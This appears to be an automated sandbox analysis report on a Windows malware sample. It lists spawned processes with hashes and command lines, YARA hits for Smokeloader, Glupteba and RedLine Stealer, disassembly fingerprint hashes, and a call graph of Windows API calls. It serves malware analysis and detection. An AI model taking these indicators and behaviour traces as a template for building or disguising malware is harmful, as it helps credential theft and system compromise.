                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'172'545 bytes
                                                                                                                                                                                                                                MD5 hash:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                Start time:11:27:51
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp" /SL5="$30596,1807550,56832,C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:706'560 bytes
                                                                                                                                                                                                                                MD5 hash:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                Start time:11:27:51
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'283'784 bytes
                                                                                                                                                                                                                                MD5 hash:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002A.00000002.3211879982.00000000012C8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:43
Start time:11:27:51
Start date:12/03/2024
Path:C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe" --silent --allusers=0
Imagebase:0xab0000
File size:2'960'760 bytes
MD5 hash:AAFB0357588673B1DB5973DFF4616B8F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:11:27:51
Start date:12/03/2024
Path:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
Imagebase:0x180000
File size:2'960'760 bytes
MD5 hash:95F97B76DCB43201CEBCFACE99D5C36C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

                                                                                                                                                                                                                                  • Instruction ID: ab35ee839fa7a36420a1621473789207b776c24018d9d6d379ddfd8d738c6731
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f794655ed58ddad72a6afd3173e95089f071a55e2f7c618f96e1a7b91f1000b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D01A2727002058FCB11E76CD9805ADB7A3ABD4314F108829D406DB358CF75AE858782
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f9b8f17d24389d162fc81e4a8d0ed56bc1d8c6a1faa3e80b3c421e67ad587708
                                                                                                                                                                                                                                  • Instruction ID: 90a0ef70947e400290f5e08314534a76080672a17239556e144f33085698f4f6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9b8f17d24389d162fc81e4a8d0ed56bc1d8c6a1faa3e80b3c421e67ad587708
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AF0BE31B00208BFC728566DA904ABBABEAEBC8620F00007CE91DC3350CA2E4C0747A6
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 47529c308187647f4904c0712c7474f01b1823cfe997482397c8e0e3db300ecc
                                                                                                                                                                                                                                  • Instruction ID: de549e0ac86f273eb2f0250e970c13c44d59b101de0182a452805debd355b71d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47529c308187647f4904c0712c7474f01b1823cfe997482397c8e0e3db300ecc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF0E2327042602FC716166CA8106AB7BA9CBC5620F0900BAE509C7341C99E4C4743E2
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3c5920d223ff055de927e4e79352e31b2b30c84bf49771e79d031dc987eb0928
                                                                                                                                                                                                                                  • Instruction ID: 6eebe8f0c398732679791ba8579e51cdd331ecf6493f066387620fae83ecc223
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c5920d223ff055de927e4e79352e31b2b30c84bf49771e79d031dc987eb0928
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09F0E9226043411FC3066739981506EFA9BBEC22503088ABFD55ECF795ED61DC4A47D3
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 806e4007292193533582a8e753bfb26c7eaf63ec30fd0fdbee1a627762fb2c8c
                                                                                                                                                                                                                                  • Instruction ID: 9d8b5f035943a0858a4347fda4b97366ffd9e45f313431af19a6410bd0db465e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 806e4007292193533582a8e753bfb26c7eaf63ec30fd0fdbee1a627762fb2c8c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEF09632B00119CBDF14AB68986472E619BBF9474CF104069E506FB3ADCF399EC18797
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4e309c882ca581db5a9980371b5bc3b5761652534668e192a42c516c60c52209
                                                                                                                                                                                                                                  • Instruction ID: 9057a01125fcf6d5906700495d937178f8107a8916feb2dd94be6e78d3125c21
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e309c882ca581db5a9980371b5bc3b5761652534668e192a42c516c60c52209
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68F0B422B40118CBDF14AB7C989462D2197BFD4B4CF000068E506FB3ADCE799EC187AA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 14e18ad4137d20ebdddaa530566cad831e05269e3df3658a51ca07004dc7e1cc
                                                                                                                                                                                                                                  • Instruction ID: c1b3c8727fee5db7ae62fafed74b95ef8dcfb43dfff375b57d1baa353679c116
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14e18ad4137d20ebdddaa530566cad831e05269e3df3658a51ca07004dc7e1cc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33F04F32784209CBC754EB6C8D94B7E76B6AB88718F204458F401EB359CB758E818BD2
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9b4f04e2ac8760831af42403a7fe9cae2acd494ea5663aee622c10cdae276901
                                                                                                                                                                                                                                  • Instruction ID: bea67a2ae277774b957f28bc08a6fe0ad44ea328c9c845daa700b6bdc3772388
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b4f04e2ac8760831af42403a7fe9cae2acd494ea5663aee622c10cdae276901
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98F0E27250D284AFCB02CB78D92528DBF74EB47204F9940EBD544C7262E5355E09C751
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: db250a6abc2f84d5bfa3760961d1e00a56bd82d368c596fb94c0d1d3b2115507
• Instruction ID: cbfebdba16d45eb66fd1ad79df4d5b15699d31cb209e2f43f80b4bfed450aec6
• Opcode Fuzzy Hash: db250a6abc2f84d5bfa3760961d1e00a56bd82d368c596fb94c0d1d3b2115507
• Instruction Fuzzy Hash: 6CD01770A08109EF8B00DFB8EA0555DF7B9FB88200B9082A9E908D3204EA326E049B80
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 040c8c8c2923b50e3da6a6788c933a276bafd14fad86a765f90eb583e00cc812
• Instruction ID: 8471d1c0084a5665f7c5974e82162e2e036853b99696231659ecd7d0532bfb00
• Opcode Fuzzy Hash: 040c8c8c2923b50e3da6a6788c933a276bafd14fad86a765f90eb583e00cc812
• Instruction Fuzzy Hash: 6BA0024255C41DD18B042BA69D94429540E96D1B4D30105365A175A5999C985BD1419F
Uniqueness

Uniqueness Score: -1.00%
Execution Graph

Execution Coverage: 21.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.4%
Total number of Nodes: 1521
Total number of Limit Nodes: 22
execution_graph (rendered call graph; only its text form survives here and the listing is cut off before the last nodes). In that text form every node is a numeric id followed by the code address it stands for and either the Windows API names called at that address or a summary such as "35 API calls"; edges are written id->id (for example: 5453 407548, 5454 407554 CloseHandle, 5453->5454). APIs named on the graph's nodes, grouped by theme:

• Process, memory and exception handling: GetCurrentProcess, ExitProcess, GetSystemInfo, VirtualQuery, VirtualProtect, VirtualAlloc, VirtualFree, LocalAlloc, LocalFree, SetProcessDEPPolicy, RaiseException, RtlUnwind, RtlInitializeCriticalSection, RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, InterlockedExchange, GetLastError, SetLastError, SetErrorMode
• Token privileges and shutdown: OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx
• Module and resource loading: GetModuleHandleA, GetProcAddress, LoadLibraryA, GetModuleFileNameA, GetCommandLineA, FindResourceA, SizeofResource, LoadResource, LockResource
• File system: CreateFileA, ReadFile, WriteFile, SetFilePointer, SetEndOfFile, CloseHandle, CreateDirectoryA, RemoveDirectoryA, GetFileAttributesA, GetFullPathNameA, GetWindowsDirectoryA, GetEnvironmentVariableA, Wow64RevertWow64FsRedirection
• Registry: RegOpenKeyExA, RegQueryValueExA, RegCloseKey
• Locale and version: GetSystemDefaultLCID, GetUserDefaultLangID, GetLocaleInfoA, GetACP, GetVersionExA, IsDBCSLeadByte, CharPrevA, GetSystemTime
• UI and COM: MessageBoxA, DestroyWindow, CallWindowProcA, VariantClear
5811->5794 5814 40147c VirtualFree 5814->5811 5817 40160a 5815->5817 5816 40163a 5816->5798 5817->5816 5818 401626 VirtualAlloc 5817->5818 5818->5816 5818->5817 5820 401348 5819->5820 5821 4012e4 LocalAlloc 5820->5821 5822 40138f 5821->5822 5822->5794 5826 40153b 5823->5826 5824 401594 5824->5799 5825 401568 VirtualFree 5825->5826 5826->5824 5826->5825 5830 40128c 5827->5830 5829 4012ef 5829->5811 5829->5814 5831 401298 LocalAlloc 5830->5831 5832 4012aa 5830->5832 5831->5832 5832->5829 5832->5832 5834 401d92 5833->5834 5835 401d89 5833->5835 5834->5803 5835->5834 5842 401b74 5835->5842 5838 401b61 5837->5838 5839 401b52 5837->5839 5838->5805 5840 401d00 9 API calls 5839->5840 5841 401b5f 5840->5841 5841->5805 5845 40215c 5842->5845 5844 401b95 5844->5834 5846 40217a 5845->5846 5847 402175 5845->5847 5849 4021ab RtlEnterCriticalSection 5846->5849 5851 4021b5 5846->5851 5853 40217e 5846->5853 5848 401918 4 API calls 5847->5848 5848->5846 5849->5851 5850 4021c1 5854 4022e3 RtlLeaveCriticalSection 5850->5854 5855 4022ed 5850->5855 5851->5850 5852 402244 5851->5852 5857 402270 5851->5857 5852->5853 5856 401d80 7 API calls 5852->5856 5853->5844 5854->5855 5855->5844 5856->5853 5857->5850 5858 401d00 7 API calls 5857->5858 5858->5850 5860 401c7a 5859->5860 5861 401c9d 5860->5861 5862 401caf 5860->5862 5872 40188c 5861->5872 5864 40188c 3 API calls 5862->5864 5865 401cad 5864->5865 5866 401b44 9 API calls 5865->5866 5871 401cc5 5865->5871 5867 401cd4 5866->5867 5868 401cee 5867->5868 5882 401b98 5867->5882 5887 4013a0 5868->5887 5871->5788 5873 4018b2 5872->5873 5881 40190b 5872->5881 5891 401658 5873->5891 5876 40132c LocalAlloc 5877 4018cf 5876->5877 5878 4018e6 5877->5878 5879 40150c VirtualFree 5877->5879 5880 4013a0 LocalAlloc 5878->5880 5878->5881 5879->5878 5880->5881 5881->5865 5883 401b9d 5882->5883 5884 401bab 5882->5884 5885 401b74 9 API calls 5883->5885 5884->5868 5886 401baa 5885->5886 5886->5868 5888 4013ab 5887->5888 5889 4013c6 5888->5889 5890 4012e4 
LocalAlloc 5888->5890 5889->5871 5890->5889 5894 40168f 5891->5894 5892 4016cf 5892->5876 5893 4016a9 VirtualFree 5893->5894 5894->5892 5894->5893 6851 402dfa 6852 402e26 6851->6852 6853 402e0d 6851->6853 6855 402ba4 6853->6855 6856 402bc9 6855->6856 6857 402bad 6855->6857 6856->6852 6858 402bb5 RaiseException 6857->6858 6858->6856 6859 4075fa GetFileSize 6860 407626 6859->6860 6861 407616 GetLastError 6859->6861 6861->6860 6862 40761f 6861->6862 6863 40748c 35 API calls 6862->6863 6863->6860 6864 406ffb 6865 407008 SetErrorMode 6864->6865 6533 403a80 CloseHandle 6534 403a90 6533->6534 6535 403a91 GetLastError 6533->6535 6536 404283 6537 4042c3 6536->6537 6538 403154 4 API calls 6537->6538 6539 404323 6538->6539 6866 404185 6867 4041ff 6866->6867 6868 403154 4 API calls 6867->6868 6869 4041cc 6867->6869 6870 404323 6868->6870 6540 403e87 6541 403e4c 6540->6541 6542 403e67 6541->6542 6543 403e62 6541->6543 6544 403e7b 6541->6544 6547 403e78 6542->6547 6553 402674 6542->6553 6549 403cc8 6543->6549 6546 402674 4 API calls 6544->6546 6546->6547 6551 403cd6 6549->6551 6550 403ceb 6550->6542 6551->6550 6552 402674 4 API calls 6551->6552 6552->6550 6554 403154 4 API calls 6553->6554 6555 40267a 6554->6555 6555->6547 6564 407e90 6565 407eb8 VirtualFree 6564->6565 6566 407e9d 6565->6566 6569 403e95 6571 403e4c 6569->6571 6570 403e67 6576 403e78 6570->6576 6577 402674 4 API calls 6570->6577 6571->6570 6572 403e62 6571->6572 6573 403e7b 6571->6573 6574 403cc8 4 API calls 6572->6574 6575 402674 4 API calls 6573->6575 6574->6570 6575->6576 6577->6576 6578 40ac97 6587 4096fc 6578->6587 6581 402f24 5 API calls 6582 40aca1 6581->6582 6583 403198 4 API calls 6582->6583 6584 40acc0 6583->6584 6585 403198 4 API calls 6584->6585 6586 40acc8 6585->6586 6596 4056ac 6587->6596 6589 409745 6593 403198 4 API calls 6589->6593 6590 409717 6590->6589 6602 40720c 6590->6602 6592 409735 6595 40973d MessageBoxA 6592->6595 6594 40975a 6593->6594 6594->6581 6594->6582 6595->6589 6597 403154 4 API 
calls 6596->6597 6598 4056b1 6597->6598 6599 4056c9 6598->6599 6600 403154 4 API calls 6598->6600 6599->6590 6601 4056bf 6600->6601 6601->6590 6603 4056ac 4 API calls 6602->6603 6604 40721b 6603->6604 6605 407221 6604->6605 6606 40722f 6604->6606 6607 40322c 4 API calls 6605->6607 6609 40724b 6606->6609 6610 40723f 6606->6610 6608 40722d 6607->6608 6608->6592 6620 4032b8 6609->6620 6613 4071d0 6610->6613 6614 40322c 4 API calls 6613->6614 6615 4071df 6614->6615 6616 4071fc 6615->6616 6617 406950 CharPrevA 6615->6617 6616->6608 6618 4071eb 6617->6618 6618->6616 6619 4032fc 18 API calls 6618->6619 6619->6616 6621 403278 18 API calls 6620->6621 6622 4032c2 6621->6622 6622->6608 6623 403a97 6624 403aac 6623->6624 6625 403bbc GetStdHandle 6624->6625 6626 403b0e CreateFileA 6624->6626 6632 403ab2 6624->6632 6627 403c17 GetLastError 6625->6627 6640 403bba 6625->6640 6626->6627 6628 403b2c 6626->6628 6627->6632 6630 403b3b GetFileSize 6628->6630 6628->6640 6630->6627 6633 403b4e SetFilePointer 6630->6633 6631 403be7 GetFileType 6631->6632 6635 403c02 CloseHandle 6631->6635 6633->6627 6636 403b6a ReadFile 6633->6636 6635->6632 6636->6627 6637 403b8c 6636->6637 6638 403b9f SetFilePointer 6637->6638 6637->6640 6638->6627 6639 403bb0 SetEndOfFile 6638->6639 6639->6627 6639->6640 6640->6631 6640->6632 6645 40aaa2 6646 40aad2 6645->6646 6647 40aadc CreateWindowExA SetWindowLongA 6646->6647 6648 405194 33 API calls 6647->6648 6649 40ab5f 6648->6649 6650 4032fc 18 API calls 6649->6650 6651 40ab6d 6650->6651 6652 4032fc 18 API calls 6651->6652 6653 40ab7a 6652->6653 6654 406b7c 19 API calls 6653->6654 6655 40ab86 6654->6655 6656 4032fc 18 API calls 6655->6656 6657 40ab8f 6656->6657 6658 4099ec 43 API calls 6657->6658 6659 40aba1 6658->6659 6660 4098cc 19 API calls 6659->6660 6661 40abb4 6659->6661 6660->6661 6662 40abed 6661->6662 6663 4094d8 9 API calls 6661->6663 6664 40ac06 6662->6664 6667 40ac00 RemoveDirectoryA 6662->6667 6663->6662 6665 40ac1a 6664->6665 6666 40ac0f 
DestroyWindow 6664->6666 6668 40ac42 6665->6668 6669 40357c 4 API calls 6665->6669 6666->6665 6667->6664 6670 40ac38 6669->6670 6671 4025ac 4 API calls 6670->6671 6671->6668 6883 405ba2 6885 405ba4 6883->6885 6884 405be0 6888 405940 19 API calls 6884->6888 6885->6884 6886 405bf7 6885->6886 6887 405bda 6885->6887 6891 404cdc 19 API calls 6886->6891 6887->6884 6889 405c4c 6887->6889 6892 405bf3 6888->6892 6890 4059b0 33 API calls 6889->6890 6890->6892 6894 405c20 6891->6894 6893 403198 4 API calls 6892->6893 6895 405c86 6893->6895 6896 4059b0 33 API calls 6894->6896 6896->6892 6897 408da4 6898 408dc8 6897->6898 6899 408c80 18 API calls 6898->6899 6900 408dd1 6899->6900 6672 402caa 6673 403154 4 API calls 6672->6673 6674 402caf 6673->6674 6915 4011aa 6916 4011ac GetStdHandle 6915->6916 6675 4028ac 6676 402594 18 API calls 6675->6676 6677 4028b6 6676->6677 4987 40aab4 4988 40aab8 SetLastError 4987->4988 5019 409648 GetLastError 4988->5019 4991 40aad2 4993 40aadc CreateWindowExA SetWindowLongA 4991->4993 5032 405194 4993->5032 4997 40ab6d 4998 4032fc 18 API calls 4997->4998 4999 40ab7a 4998->4999 5049 406b7c GetCommandLineA 4999->5049 5002 4032fc 18 API calls 5003 40ab8f 5002->5003 5054 4099ec 5003->5054 5005 40aba1 5007 40abb4 5005->5007 5075 4098cc 5005->5075 5008 40abd4 5007->5008 5009 40abed 5007->5009 5081 4094d8 5008->5081 5011 40ac06 5009->5011 5013 40ac00 RemoveDirectoryA 5009->5013 5012 40ac0f DestroyWindow 5011->5012 5014 40ac1a 5011->5014 5012->5014 5013->5011 5015 40ac42 5014->5015 5089 40357c 5014->5089 5017 40ac38 5102 4025ac 5017->5102 5106 404c94 5019->5106 5027 4096c3 5121 4031b8 5027->5121 5033 4051a8 33 API calls 5032->5033 5034 4051a3 5033->5034 5035 4032fc 5034->5035 5036 403300 5035->5036 5037 40333f 5035->5037 5038 4031e8 5036->5038 5039 40330a 5036->5039 5037->4997 5045 403254 18 API calls 5038->5045 5046 4031fc 5038->5046 5040 403334 5039->5040 5041 40331d 5039->5041 5043 4034f0 18 API calls 5040->5043 5282 4034f0 5041->5282 5048 403322 
5043->5048 5044 403228 5044->4997 5045->5046 5046->5044 5047 4025ac 4 API calls 5046->5047 5047->5044 5048->4997 5308 406af0 5049->5308 5051 406ba1 5052 403198 4 API calls 5051->5052 5053 406bbf 5052->5053 5053->5002 5322 4033b4 5054->5322 5056 409a27 5057 409a59 CreateProcessA 5056->5057 5058 409a65 5057->5058 5059 409a6c CloseHandle 5057->5059 5060 409648 35 API calls 5058->5060 5061 409a75 5059->5061 5060->5059 5062 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5061->5062 5063 409a7a MsgWaitForMultipleObjects 5062->5063 5063->5061 5064 409a91 5063->5064 5065 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5064->5065 5066 409a96 GetExitCodeProcess CloseHandle 5065->5066 5067 409ab6 5066->5067 5068 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5067->5068 5069 409abe 5068->5069 5069->5005 5070 402f24 5071 403154 4 API calls 5070->5071 5072 402f29 5071->5072 5328 402bcc 5072->5328 5074 402f51 5074->5074 5076 4098d4 5075->5076 5080 40990e 5075->5080 5077 403420 18 API calls 5076->5077 5076->5080 5078 409908 5077->5078 5331 408e80 5078->5331 5080->5007 5082 409532 5081->5082 5084 4094eb 5081->5084 5082->5009 5083 4094f3 Sleep 5083->5084 5084->5082 5084->5083 5085 409503 Sleep 5084->5085 5087 40951a GetLastError 5084->5087 5354 408fbc 5084->5354 5085->5084 5087->5082 5088 409524 GetLastError 5087->5088 5088->5082 5088->5084 5090 403591 5089->5090 5091 4035a0 5089->5091 5094 4035d0 5090->5094 5095 40359b 5090->5095 5099 4035b6 5090->5099 5092 4035b1 5091->5092 5093 4035b8 5091->5093 5096 403198 4 API calls 5092->5096 5097 4031b8 4 API calls 5093->5097 5094->5099 5100 40357c 4 API calls 5094->5100 5095->5091 5098 4035ec 5095->5098 5096->5099 5097->5099 5098->5099 5371 403554 5098->5371 5099->5017 5100->5094 5103 4025b0 5102->5103 5104 4025ba 5102->5104 5103->5104 5105 403154 4 API calls 5103->5105 5104->5015 5105->5104 5129 4051a8 5106->5129 5109 407284 FormatMessageA 5110 4072aa 5109->5110 5111 403278 18 API calls 5110->5111 5112 4072c7 5111->5112 
